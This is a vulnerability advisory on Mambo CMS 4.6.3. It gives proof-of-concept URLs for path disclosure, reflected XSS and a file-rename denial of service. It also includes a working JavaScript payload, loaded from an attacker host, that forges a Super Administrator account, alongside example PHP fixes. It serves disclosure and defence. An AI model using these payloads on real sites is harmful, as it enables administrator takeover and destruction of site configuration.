Mambo 4.6.3 Path Disclosure, XSS, XSRF, DOS
########################## WwW.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: Mambo Vulnerabilities
# Vendor: http://mamboserver.com
# Bugs: Path Disclosure, XSS, XSRF, DOS
# Vulnerable Version: 4.6.3 (prior versions may also be affected)
# Exploitation: Remote with browser
# Fix Available: No!
################################################################
####################
- Description:
####################
Mambo is an open source, modular web content management system (CMS),
written in PHP with a MySQL database as the backend.
####################
- Vulnerability:
####################
+--> Path Disclosure
POC:
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=RenameFile
+--> XSS
POC:
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=<script>alert(document.cookie)</script>
+--> XSRF via the XSS above (the exploit creates an admin account)
The reflected Command value is used to load an attacker-hosted script into the Mambo origin; when a logged-in administrator opens the link, that script posts the user-save form to the back end with the administrator's session cookie.
POC:
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=<script type=text/javascript src=http://somewhere/test.js></script>
content of http://somewhere/test.js
/*
Set the desired user, pass, email and the victim's URL, then upload the script
somewhere on the web.
*/
window.onload = function() {
    // Back-end entry point of the victim site; the browser attaches the
    // administrator's session cookie to the POST automatically.
    var url = 'http://localhost/MamboV4.6.2/administrator/index2.php';
    var gid = 25; // Super Administrator group in Mambo
    var user = 'amnpardaz';
    var pass = 'amnpardaz';
    var email = 'amnpardaz@none.com';
    // Fields of the com_users "save" form as the back end expects them.
    var param = {
        name: user,
        username: user,
        email: email,
        password: pass,
        password2: pass,
        gid: gid,
        block: 0,
        option: 'com_users',
        task: 'save',
        sendEmail: 0
    };
    // Build a hidden form carrying those fields and submit it.
    var form = document.createElement('form');
    form.action = url;
    form.method = 'post';
    form.target = 'hidden';
    form.style.display = 'none';
    for (var i in param) {
        var input;
        try { // IE: the name attribute can only be set through markup
            input = document.createElement('<input name="' + i + '">');
        } catch (e) { // other browsers
            input = document.createElement('input');
            input.name = i;
        }
        input.setAttribute('value', param[i]);
        form.appendChild(input);
    }
    document.body.appendChild(form);
    form.submit();
    // Navigate away so the victim does not see the submitted form.
    location.replace(url);
};
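The chain above needs two weaknesses at once: connector.php reflects the Command value into its response unencoded, and administrator/index2.php accepts the user-save POST on the strength of the session cookie alone. The following is an added example, not Mambo or MOStlyCE code, of the two checks that break the chain; the function names, the "Unknown command" message and the handler sketch are assumptions, because the real connector and com_users code are not reproduced in this advisory.

```php
<?php
// Added example, not Mambo or MOStlyCE code. Function names, the
// "Unknown command" text and the handler sketch are assumptions: the real
// connector.php and com_users code are not shown in this advisory.

// (a) Reflected output. The XSS works because the connector writes the
//     unrecognised Command value back into its response as-is. Encoding it
//     for an HTML context turns "<script>" into "&lt;script&gt;", which is
//     rendered as text and never executed.
function render_unknown_command(string $command): string
{
    return 'Unknown command: ' . htmlspecialchars($command, ENT_QUOTES, 'UTF-8');
}

// (b) Admin state change. index2.php accepts the com_users "save" POST
//     because the browser attaches the admin's session cookie; nothing
//     proves the request came from Mambo's own form. A per-session secret
//     that only that form carries, and that the handler verifies, closes it.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit random
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(?string $submitted): bool
{
    return $submitted !== null
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted); // constant-time compare
}

// Hidden field to place inside the user-edit form.
function csrf_field(): string
{
    return '<input type="hidden" name="token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Guard for the option=com_users&task=save branch: refuse before any DB write.
function require_csrf_token(array $post): void
{
    if (!csrf_check($post['token'] ?? null)) {
        http_response_code(403);
        exit('Invalid request token');
    }
}

// Usage: call session_start() first; echo csrf_field() inside the user-edit
// form; call require_csrf_token($_POST) at the top of the save handler.
```

The token only helps once the reflection in (a) is encoded: script that already runs inside the Mambo origin through the XSS can fetch the user-edit form and read the token out of it. For this advisory (a) is the fix that matters; (b) is the defence against the same POST forged from a third-party site without any XSS.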
+--> DOS
MOStlyCE Image Manager note from Mambo 4.6.3:
  Important: In order to utilize the Image Manager functionality you must create the folder structure shown below in your document root folder.
  Not your Mambo root, your document root! For this installation your document root is [something].
  You can create this structure manually or extract the UserFiles.zip file included with MOStlyCE at that location.
  You can find the UserFiles.zip file at /mambots/editors/mostlyce.
If an administrator follows the above instructions, a remote attacker can remove any file that the web-server account is permitted to move, for example the main configuration file (configuration.php), which results in a remote denial of service. As the snippet below shows, the file is not deleted but passed to rename(), which moves it into the file manager's current upload folder under the name the attacker supplied; it disappears from its original location.
The impact increases when the administrator has not removed the "installation" folder (it is common to rename it to something predictable such as "_installation"): an attacker can then remove configuration.php and run the installer to set up a fresh copy of Mambo on the victim server, pointed at a database the attacker controls.
Code Snippet:
/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/Commands/FileUpload.php
#45-60
function run() {
    //If using CGI Upload script, get file info and insert into $_FILE array
    if (
            (sizeof($_FILES)==0) &&
            isset($_GET['file']) &&
            isset($_GET['file']['NewFile']) &&
            is_array($_GET['file']['NewFile'])
        ) {
        if (isset($_GET['file']['NewFile']['name'])&&$_GET['file']['NewFile']['size']&&$_GET['file']['NewFile']['tmp_name']) {
            // Every field, including tmp_name, is taken from the query string:
            // the client chooses which server-side path is treated as the upload.
            $_FILES['NewFile']['name']=basename(str_replace("\\","/",$_GET['file']['NewFile']['name']));
            $_FILES['NewFile']['size']=$_GET['file']['NewFile']['size'];
            $_FILES['NewFile']['tmp_name']=$_GET['file']['NewFile']['tmp_name'];
        } else {
            $disp="202,'Incomplete file information from upload CGI'";
        }
    }
    .
    .
    .
#163-178
//Upload file
if (is_uploaded_file($_FILES['NewFile']['tmp_name'])) {
    if (move_uploaded_file($_FILES['NewFile']['tmp_name'],($this->real_cwd."/$filename.$ext"))) {
        chmod(($this->real_cwd."/$filename.$ext"),0777);
        $disp="0";
    } else {
        $disp="202,'Failed to upload file, internal error...'";
    }
} else {
    // Not a real upload, so is_uploaded_file() fails and the code falls through
    // to rename(): the attacker-supplied path is moved into the upload folder.
    if (rename($_FILES['NewFile']['tmp_name'],($this->real_cwd."/$filename.$ext"))) {
        chmod(($this->real_cwd."/$filename.$ext"),0777);
        $disp="0";
    } else {
        $disp="202,'Failed to upload file, internal error...'";
    }
}
..
..
..
POC:
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder=
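A hardened replacement for the upload path in Commands/FileUpload.php, added here as an example; it is not MOStlyCE or Mambo code, and the class name UploadCommand, the $files parameter and the image-only extension list are assumptions. It drops the $_GET fallback entirely, refuses anything is_uploaded_file() does not vouch for (so rename() is never reached with a client-supplied path), whitelists the extension, checks that the content is an image, and stops setting mode 0777.

```php
<?php
// Added example, not MOStlyCE/Mambo code: a hardened version of the upload
// step shown in Commands/FileUpload.php. UploadCommand, the $files
// parameter and ALLOWED_EXT are assumptions made for illustration.
class UploadCommand
{
    private string $real_cwd;
    // The Image Manager only needs images; everything else is refused.
    private const ALLOWED_EXT = ['gif', 'jpg', 'jpeg', 'png'];

    public function __construct(string $real_cwd)
    {
        $this->real_cwd = rtrim($real_cwd, '/');
    }

    /** Returns the connector-style status: "0" on success, "202,'...'" on error. */
    public function run(array $files): string
    {
        // 1. No $_GET fallback. The upload must come from $_FILES, which PHP
        //    itself populates; a client cannot point it at a server-side path.
        if (!isset($files['NewFile']) || !is_array($files['NewFile'])) {
            return "202,'No file uploaded'";
        }
        $f = $files['NewFile'];
        if (($f['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
            return "202,'Upload failed'";
        }
        // 2. Never fall back to rename(). is_uploaded_file() is the only proof
        //    that tmp_name is this request's temporary file.
        if (!is_uploaded_file($f['tmp_name'])) {
            return "202,'Not an uploaded file'";
        }
        // 3. Destination name from a whitelisted extension and a sanitised
        //    basename, so the client controls neither the path nor the type.
        $name = basename(str_replace('\\', '/', (string) $f['name']));
        $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
        if (!in_array($ext, self::ALLOWED_EXT, true)) {
            return "202,'File type not allowed'";
        }
        $base = preg_replace('/[^A-Za-z0-9_-]/', '_', pathinfo($name, PATHINFO_FILENAME));
        if ($base === '' || $base === null) {
            $base = 'file';
        }
        $dest = $this->real_cwd . '/' . $base . '.' . $ext;
        if (file_exists($dest)) { // do not let an upload overwrite an existing file
            $dest = $this->real_cwd . '/' . $base . '_' . bin2hex(random_bytes(4)) . '.' . $ext;
        }
        // 4. Reject content that is not parseable as an image at all.
        if (@getimagesize($f['tmp_name']) === false) {
            return "202,'Not a valid image'";
        }
        if (!move_uploaded_file($f['tmp_name'], $dest)) {
            return "202,'Failed to upload file, internal error...'";
        }
        // 5. 0644 rather than 0777: other local accounts cannot rewrite the file.
        chmod($dest, 0644);
        return '0';
    }
}

// Usage inside the connector, in place of the original run() body:
//   $cmd  = new UploadCommand($this->real_cwd);
//   $disp = $cmd->run($_FILES);
```

getimagesize() only confirms that the file starts with a recognisable image header, so it is a content-type check and not a guarantee against polyglot files; the extension whitelist and the removal of the rename() path are what close the issue described in this advisory, and serving the UserFiles tree with PHP execution disabled is the remaining defence in depth.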
####################
- Credit :
####################
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com